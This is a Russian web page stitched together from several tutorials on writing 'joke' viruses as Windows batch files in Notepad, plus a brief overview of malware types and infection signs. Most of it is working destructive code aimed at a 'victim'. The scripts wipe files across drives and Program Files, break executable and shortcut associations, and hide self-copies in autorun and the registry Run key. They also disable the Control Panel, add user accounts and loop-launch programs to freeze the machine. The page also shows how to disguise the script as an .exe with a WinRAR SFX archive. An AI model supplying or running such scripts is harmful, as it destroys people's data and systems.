» » Как создать вирус шутку с помощью блокнота. Как создать вирус? Компьютерные вирусы. Как сделать вирус-шутку Как создать вирусную программу

Как создать вирус шутку с помощью блокнота. Как создать вирус? Компьютерные вирусы. Как сделать вирус-шутку Как создать вирусную программу

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате.bat. Для изменения расширений, нужно настроить систему:

  • Открываем «Компьютер «
  • Заходим верхнее в меню «Сервис «, если не видно жмем ALT
  • В этом меню заходим в «Сервис » выбираем пункт «Параметры папок «
  • Заходим во вкладку «Вид » и ищем пункт «Скрывать расширения для зарегистрированных типов файлов «
  • Убираем галочку с этого пункта.

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc » и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

  • Первым делом открываем блокнот;
  • Заносим туда команды, т.е. создаём в нём «тело» вируса;
  • Сохраняем свой труд через Файл -> Сохранить как ;
  • Теперь осталось изменить расширение файла . txt на . bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

  1. @ Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
  2. Date11.14 – указывает на дату создания.
  3. If exist c: sky. bat goto abc – проверка существования на диске С файла sky.bat и если его нет
  4. Copy %0 c:sk y.bat – размножает себя, изменив первоначальное имя файла на sky.bat
  5. Attrib + h c: sky. bat – скрывает созданный файл от посторонних глаз.
  6. Echo c: sky. bat >> autoexec. bat – вирус прописывается в автозагрузку.
  7. : abc – если он есть, выполнение программы перейдёт сюда.
  1. md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
  2. md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
  3. Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
  4. assoc . exe=. mp3 – расширение.exe будет ассоциироваться, как.mp
  5. del c:Program Files /q –всё, что было в папке Program Files удалится.
  6. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

  1. del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения.bat в.exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

BATCH & EXECUTE
BUGS

В данное время, вирусы умножаются в десятки тысяч раз, как мы предполагаем. Они появились еще в 80 годах. В те времена мир узнал, что такое вирусы и что они делает, когда попадают в ПК. Сегодня я «SMOKED» расскажу вам, как создать свой вирус в блокноте, и хочу сказать, что это только коммандный файл, который будет только давать приказы системе и микропроцессору.
Самый смак в этой работе, то что юзер не будет знать, что его прога на самом деле бомба для Windows-а.
Итак, приступим. Вы решили заняться вирусописательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет, с вашим компьютером отвечаете вы и только вы. Здесь нам потребуется только блокнот.
Приступим:

1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо.txt мы напишем.bat;
4) Открываем файл, и увидим, что открылся Paint 
Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем!  Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена).
Итак, пишем в блокноте:

time 00:00
copy %0 F:\Work.bat

Первой строчкой мы изменяем время на 00:00, а второй скопируем файл на диск (F, G, J, K, H) - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате.bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число.   Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.

СПИСОК:

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок) (пример del F:\Data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);

Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.

1) Программа для удаления файлов с флешки (если та вставлена) и переименования ее.
del F:\ *.* /q
label F:HACK

2) Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat
Вы уже умеете создавать простенькие вирусы. Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, честно говоря. Теперь я научу вас некоторым тонкостям вирусописательства. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну, кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из.bat на.exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением.bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата.ico. Теперь жмем ОК. Готово  Формат.exe, а не.bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам.
Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q

Готов ли наш вирус? – Спросите себя. Конечно, нет. Нужно его немедленно закончить. В этом я вам с удовольствием помогу. И так наша новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

Вот, теперь наш вирус готов. Вы можете проверить его. Но не советую вам проверять его на вашем ПК  . Сохраняем, конвертируем, а вот, что дальше с ним делать - ваше дело. Кстати, есть отличная программа для конвертирования.bat в.exe, она работает намного лучше WinRAR"а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.
%SystemRoot%/system32/rundll32 user32, SwapMouseButton Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться, пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.
Итак, дальше поехали дальше:

:x ;
Start mspaint
goto x ;

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает  Можно использовать по несколько таких команд до полного торможения компьютера нашей жертвы.

Пишем новый скрипт:

copy ""%0"" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Очень жестокая команда, добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, и едем дальше. 

assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с.lnk в.txt и.exe в.mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас, вы закончили базовый курс, от SMOKED-а вирусописательства. Если же нет. Читаем все заново  

@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ;
Start mspaint
goto x ;
:x ;
Start Calc
goto x ;
copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

На этом мои уроки закончены. Надеюсь, вам понравилось! С уважением SMOKED! P.S. Когда я первый раз выложил эту статью в интернет. На мой ICQ пришло около 70 сообщений с просьбой взломать почтовый ящик . Писал все сам, статья моя! 

Это программное обеспечение, целью создания которого является получение несанкционированного доступа к ресурсам компьютера или информации на жестком диске. Часто создается для нанесения вреда путем копирования, искажения, удаления, подмены информации. Рассмотрим далее, как создать вирус-шутку, защититься от вирусов.

Что такое вирус

Перед тем как создать вирус, необходимо точно определить, что это такое. Чтобы программа считалась вредоносной, она должна:

  • уничтожать информацию или нарушать работу компьютера;
  • выполняться без предупреждения;
  • иметь явную цель несанкционированного доступа или уничтожения информации.

Компьютерные вирусы должны отвечать всем вышеназванным критериям. Например, взломщик защиты от копирования - это не вредоносная программа. Она не уничтожает файлы, а только подбирает пароль для разблокировки. Также программа для форматирования диска не может считаться вредоносной. Она уничтожает данные на компьютере, но выполняется с согласия пользователя. Если программа уничтожает информацию из-за внутренних ошибок, она тоже не считается вирусом. Хотя разработчики могут ответить за халатное отношение к работе или как нарушители прав потребителей, ведь программа могла удалить важные данные. В целом четкие критерии до сих пор не определены. Чтобы программа считалась вирусом, проводят программно-техническую экспертизу.

Виды вирусов

Зачем создают вирусы? Существует много причин. Одна часть вредоносных файлов действительно опасна и может навредить работоспособности машины, другая наносит вред косвенно. Список основных целей:

  1. Дестабилизация.
  2. Установка другого вредоносного ПО.
  3. Кража, мошенничество, шпионаж.
  4. Рекламное ПО.
  5. Прочее.

Компьютерные вирусы создают помехи, это может быть беспричинное открытие и закрытие дисковода, поломка аппаратного обеспечения.

Некоторые программы ведут себя достаточно хитро. Загрузка медиафайлов по зараженной ссылке может привести к скачиванию вредоносного ПО.

Для кражи любой информации применяется сканирование жесткого диска, регистрация нажатия клавиш, перенаправление пользователя на поддельный сайт. Так, крадутся аккаунты и используются для рассылки спама, взламываются платежные системы, блокируются компьютеры с целью вымогания денежных средств. Это бывает платное программное обеспечение, которое после скачивания ничего полезного не делает.

Из-за испорченного файла на компьютере может быть организован общедоступный прокси-сервер, машина станет участником ботнета и будет использоваться для проведения DDOS-атак. С популяризацией биткоина участились случаи скрытого майнинга на ПК пользователей.

Также существуют программы, которые показывают рекламу или собирают различную информацию в маркетинговых целях.

Как создать вирусы

В "Блокноте" (а точнее, в любом текстовом редакторе) можно создать вредоносную программу, причем сделать это можно точно так же, как создают обычные программы. Используются любые языки программирования. Обычно, это C++, но может быть Delphi и.Net. Целью создания вируса может быть шутка или ознакомление с тем, как он работает. Простая программа пишется прямо в "Блокноте", а сам код занимает очень мало строк.

Полностью исключить попадание вируса на компьютер можно при условии отключения интернета и отказа от использования нелегального ПО. Файлы, содержащие вирусы, могут функционировать и без подключения к интернету. В таком случае они навредят информации на жестком диске пользователя или станут причиной некорректной работы программ.

Сегодня основной целью хакеров становится не разработка деструктивных программ, которые явно вредят работе системы, а создание продуктов, которые ведут себя тихо. Они могут работать долгое время и в один момент нанесут очень серьезный вред.

Признаки заражения

Перед тем, как создать вирус, злоумышленники анализируют все пути, по которым его могут обнаружить, пытаются их обойти. Антивирусы эффективно находят вредоносные файлы, но по ошибке пользователя некоторые из них могут быть добавлены в исключения. Чтобы вовремя среагировать, что компьютер заражен, нужно отслеживать подозрительные и странные действия.

Самые очевидные признаки заражения:

  • открытие окон с незнакомым содержимым;
  • блокировка доступа к сайтам;
  • сторонние процессы в "Диспетчере задач";
  • новые записи в автозапуске;
  • невозможность внесения изменений в настройки компьютера;
  • случайный перезапуск компьютера или отключение.

Некоторые из симптомов могут быть вызваны вирусом-шуткой и не несут явную угрозу системе. А некоторые из них используются для отвлечения внимания, в то время пока основной вирус собирает данные о пользователе.

Распространение вирусов

Атака имеет несколько этапов. Первый отвечает на вопрос о том, как создать вирус, то есть это технологический этап. На втором осуществляется доставка вредоносного ПО на компьютер. Основные способы распространения вирусов:

  • exploit использует уязвимости в программном обеспечении, с помощью чего захватывает контроль над системой и нарушает ее функционирование;
  • логическая бомба срабатывает при определенном условии, она неотделима от той программы-носителя, в которую интегрирована;
  • троянская программа проникает в компьютер под видом легального программного обеспечения, очень часто является частью целой спланированной многоступенчатой атаки;
  • черви самостоятельно распространяются через локальные и глобальные сети, для этого используются ошибки в администрировании, а также средства социальной инженерии.

Профилактика и лечение

Для защиты от вирусов существуют антивирусы. Они качественно защищают систему, но, как правило, сам пользователь виноват в заражении системы. Поэтому нужно:

  • своевременно устанавливать обновления, использовать лицензионные копии;
  • работать на компьютере под правами пользователя, а не администратора;
  • открывать компьютерные файлы только из надежных источников;
  • использовать брандмауэр.

Как сделать вирус-шутку

Вирус - это в первую очередь программа, которая изменяет содержимое каких-либо файлов. Она создается так же, как и любая другая программа. Самые простые варианты вредоносного ПО можно создать в "Блокноте". Для этого не нужны специальные навыки или знание языков программирования.

Как создать вирусы в "Блокноте"?

Следующие строки создадут 1000 папок за одну секунду, что введет юзера в ступор:

Как создать вирус для кражи паролей? Ответить на этот вопрос уже сложнее. Для этого необходимо продумать, каким образом пользователь запустит вредоносный файл, каким образом будет осуществляться кража данных. Только потом можно приступить к реализации. Это очень сложный процесс. Кроме того, это может быть незаконно, так что не рекомендуем читателям создавать вирусы в каких-либо целях (кроме, конечно, учебных).

Недавно решил немного расширить свой кругозор в области безопасности и немного порылся в сети на тему простых вирусов в кустарных условиях. Оказывается вирусы можно создавать даже в простом блокноте. Информацию об этом я представляю только в ознакомительных целях. Помните писать вирусы - плохо. Вам же наверное не приятно когда ваш любимый компьютер заражают, вот и вы не поступайте так с другими.

Писать будем bat файл в обычном виндовом блокноте. Создаем файл и пишем.

@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat (делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
:abc (……если он существует, то программа перейдет на метку:abc)
md PRIDUROK
md LUZER
md DURAK (Создает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка
del c:Program Files/q (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)

Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat
.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу….выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.

Reg - непосредственная работа с реестром. Смотреть reg /? всем!
rcp - обмен файлами через rcp в ascii
runas - от имени пользователя
tasklist - отображает приложения и сеансы, связанные с ним.
taskkill - позволяет завершить один или несколько процессов
tftp - trivial ftp
tskill - убить процесс
reg - утилита взаимодействия с реестром
bootcfg - настройка boot.ini
append - позволяет открывать удаленные файлы так, словно они находятся в текущем.
getmac - получить мас
logoff - Заверщить пользовательский сеанс.
mem - вывод на экран сведений о текущих процессах в ОЗУ
mqbkup - архивирование
netsh - ??
openfiles - просмотреть открытые файлы.
rsh - выполнение команд на удаленных узлах с запущеной rsh
sc - command line ??
rexec - выполнение команд на удаленных узлах с запущеной rexec
shutdown - выключить (хе-хе) local or remote computer.
systeminfo - вывод инфы о компе.
schtasks - планировщик заданий.
xcopy - копирование файлов и каталогов.
tsshutdn - завершение работы сервера в установленом порядке.
set - вывод, задание и удаление переменных среды cmd.exe. Свойства системы (пр.кн."мой комп") - дополнительно - Переменные среды. Там не все переменные, но много! Все смотреть просто set.
Кстати, вот некоторые RunDLL команды, которые могут использоваться при создании батников